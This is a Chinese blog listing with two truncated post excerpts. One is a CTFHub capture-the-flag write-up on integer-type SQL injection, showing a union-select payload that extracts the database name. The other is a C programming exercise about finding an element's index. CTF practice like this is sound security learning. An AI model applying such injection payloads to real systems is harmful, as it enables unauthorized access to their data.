摘要:
web SQL注入 整数型注入 select * from news where id=1 ID: 1 Data: ctfhub select * from news where id=65535 union select 1,database() ID: 1 Data: sqli select * 阅读全文
摘要:
codeup 1934: 找x 题目描述 输入一个数n,然后输入n个数值各不相同,再输入一个值x,输出这个值在这个数组中的下标(从0开始,若不在数组中则输出 1)。 输入 测试数据有多组,输入n(1 int main() { int n; int x; //待查数据x while (scanf("% 阅读全文